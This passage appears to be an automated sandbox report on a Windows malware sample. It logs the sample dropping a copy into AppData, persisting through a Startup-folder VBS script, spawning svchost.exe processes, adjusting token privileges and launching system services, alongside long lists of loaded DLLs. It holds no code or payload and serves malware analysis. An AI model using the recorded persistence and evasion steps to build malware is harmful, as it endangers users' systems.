              Source: 7zG.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Acrobat.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AcrobatInfo.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: acrobat_sl.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AcroBroker.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AcroCEF.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: pwahelper.exe0.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@36/157@327/21
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,1_2_004333BE
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,1_2_00464EAE
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,3_2_004333BE
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,3_2_00464EAE
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeFile created: C:\Users\user\AppData\Local\directory
              Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-98KSNN
              Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-73722fd785394ff77d8e3ee9-b
              Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-73722fd785394ff7-inf
              Source: C:\Windows\System32\alg.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-73722fd785394ff79ea72c54-b
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeFile created: C:\Users\user\AppData\Local\Temp\woolpress
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
              Source: tyRPPK48Mk.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeFile read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: tyRPPK48Mk.exeReversingLabs: Detection: 73%
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeFile read: C:\Users\user\Desktop\tyRPPK48Mk.exe
              Source: unknownProcess created: C:\Users\user\Desktop\tyRPPK48Mk.exe "C:\Users\user\Desktop\tyRPPK48Mk.exe"
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\tyRPPK48Mk.exe"
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\tyRPPK48Mk.exe"
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
              Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
              Source: unknownProcess created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
              Source: unknownProcess created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
              Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
              Source: unknownProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
              Source: unknownProcess created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"
              Source: unknownProcess created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
              Source: unknownProcess created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
              Source: unknownProcess created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
              Source: unknownProcess created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
              Source: unknownProcess created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
              Source: unknownProcess created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
              Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh-agent.exe C:\Windows\System32\OpenSSH\ssh-agent.exe
              Source: unknownProcess created: C:\Windows\System32\TieringEngineService.exe C:\Windows\system32\TieringEngineService.exe
              Source: unknownProcess created: C:\Windows\System32\AgentService.exe C:\Windows\system32\AgentService.exe
              Source: unknownProcess created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
              Source: unknownProcess created: C:\Windows\System32\wbengine.exe "C:\Windows\system32\wbengine.exe"
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeSection loaded: apphelp.dll
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeSection loaded: wsock32.dll
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeSection loaded: version.dll
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeSection loaded: winmm.dll
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeSection loaded: mpr.dll
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeSection loaded: wininet.dll
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeSection loaded: userenv.dll
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeSection loaded: wldp.dll
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rstrtmgr.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: webio.dll
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\alg.exe, Section loaded: cryptbase.dll
              Source: C:\Windows\System32\alg.exe, Section loaded: mswsock.dll
              Source: C:\Windows\System32\alg.exe, Section loaded: winhttp.dll
              Source: C:\Windows\System32\alg.exe, Section loaded: mpr.dll
              Source: C:\Windows\System32\alg.exe, Section loaded: secur32.dll
              Source: C:\Windows\System32\alg.exe, Section loaded: sspicli.dll
              Source: C:\Windows\System32\alg.exe, Section loaded: dnsapi.dll
              Source: C:\Windows\System32\alg.exe, Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\alg.exe, Section loaded: ntmarta.dll
              Source: C:\Windows\System32\alg.exe, Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\alg.exe, Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exe, Section loaded: winnsi.dll
              Source: C:\Windows\System32\alg.exe, Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\alg.exe, Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\alg.exe, Section loaded: webio.dll
              Source: C:\Windows\System32\alg.exe, Section loaded: drprov.dll
              Source: C:\Windows\System32\alg.exe, Section loaded: winsta.dll
              Source: C:\Windows\System32\alg.exe, Section loaded: ntlanman.dll
              Source: C:\Windows\System32\alg.exe, Section loaded: davclnt.dll
              Source: C:\Windows\System32\alg.exe, Section loaded: davhlpr.dll
              Source: C:\Windows\System32\alg.exe, Section loaded: wkscli.dll
              Source: C:\Windows\System32\alg.exe, Section loaded: cscapi.dll
              Source: C:\Windows\System32\alg.exe, Section loaded: netutils.dll
              Source: C:\Windows\System32\alg.exe, Section loaded: browcli.dll
              Source: C:\Windows\System32\AppVClient.exe, Section loaded: appvpolicy.dll
              Source: C:\Windows\System32\AppVClient.exe, Section loaded: userenv.dll
              Source: C:\Windows\System32\AppVClient.exe, Section loaded: wtsapi32.dll
              Source: C:\Windows\System32\AppVClient.exe, Section loaded: netapi32.dll
              Source: C:\Windows\System32\AppVClient.exe, Section loaded: secur32.dll
              Source: C:\Windows\System32\AppVClient.exe, Section loaded: wininet.dll
              Source: C:\Windows\System32\AppVClient.exe, Section loaded: netutils.dll
              Source: C:\Windows\System32\AppVClient.exe, Section loaded: samcli.dll
              Source: C:\Windows\System32\AppVClient.exe, Section loaded: logoncli.dll
              Source: C:\Windows\System32\AppVClient.exe, Section loaded: sspicli.dll
              Source: C:\Windows\System32\AppVClient.exe, Section loaded: winhttp.dll
              Source: C:\Windows\System32\AppVClient.exe, Section loaded: mpr.dll
              Source: C:\Windows\System32\AppVClient.exe, Section loaded: dnsapi.dll
              Source: C:\Windows\System32\AppVClient.exe, Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\AppVClient.exe, Section loaded: ntmarta.dll
              Source: C:\Windows\System32\AppVClient.exe, Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\AppVClient.exe, Section loaded: appmanagementconfiguration.dll
              Source: C:\Windows\System32\FXSSVC.exe, Section loaded: version.dll
              Source: C:\Windows\System32\FXSSVC.exe, Section loaded: tapi32.dll
              Source: C:\Windows\System32\FXSSVC.exe, Section loaded: credui.dll
              Source: C:\Windows\System32\FXSSVC.exe, Section loaded: fxstiff.dll
              Source: C:\Windows\System32\FXSSVC.exe, Section loaded: winhttp.dll
              Source: C:\Windows\System32\FXSSVC.exe, Section loaded: mpr.dll
              Source: C:\Windows\System32\FXSSVC.exe, Section loaded: secur32.dll
              Source: C:\Windows\System32\FXSSVC.exe, Section loaded: sspicli.dll
              Source: C:\Windows\System32\FXSSVC.exe, Section loaded: dnsapi.dll
              Source: C:\Windows\System32\FXSSVC.exe, Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\FXSSVC.exe, Section loaded: ntmarta.dll
              Source: C:\Windows\System32\FXSSVC.exe, Section loaded: slc.dll
              Source: C:\Windows\System32\FXSSVC.exe, Section loaded: sppc.dll
              Source: C:\Windows\System32\FXSSVC.exe, Section loaded: fxsresm.dll
              Source: C:\Windows\System32\FXSSVC.exe, Section loaded: ualapi.dll
              Source: C:\Windows\System32\FXSSVC.exe, Section loaded: windows.storage.dll
              Source: C:\Windows\System32\FXSSVC.exe, Section loaded: wldp.dll
              Source: C:\Windows\System32\FXSSVC.exe, Section loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: version.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: mlang.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: slc.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exe, Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe, Section loaded: dbghelp.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe, Section loaded: winhttp.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe, Section loaded: mpr.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: secur32.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: sspicli.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dnsapi.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: ntmarta.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: drprov.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: winsta.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: ntlanman.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: davclnt.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: davhlpr.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: wkscli.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: cscapi.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: netutils.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: browcli.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: version.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: msasn1.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: winhttp.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: mpr.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: secur32.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: sspicli.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: dnsapi.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: ntmarta.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: msdtctm.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcprx.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: msdtclog.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: winmm.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: xolehlp.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: ktmw32.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: comres.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcvsp1res.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: mtxoci.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: oci.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: cscapi.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: drprov.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: ntlanman.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: davclnt.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: davhlpr.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: browcli.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dll
